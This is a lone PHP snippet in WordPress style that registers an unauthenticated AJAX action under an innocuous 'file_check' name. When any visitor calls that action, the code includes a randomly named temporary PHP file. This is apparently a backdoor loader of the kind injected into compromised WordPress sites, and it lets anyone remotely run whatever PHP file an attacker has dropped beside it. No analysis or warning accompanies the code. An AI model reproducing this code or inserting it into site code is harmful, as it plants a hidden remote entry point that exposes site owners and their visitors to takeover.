if(!function_exists('file_check_tmph1sgelmu')){ add_action('wp_ajax_nopriv_file_check_tmph1sgelmu', 'file_check_tmph1sgelmu'); add_action('wp_ajax_file_check_tmph1sgelmu', 'file_check_tmph1sgelmu'); function file_check_tmph1sgelmu() { $file = __DIR__ . '/' . 'tmph1sgelmu.php'; if (file_exists($file)) { include $file; } die(); } }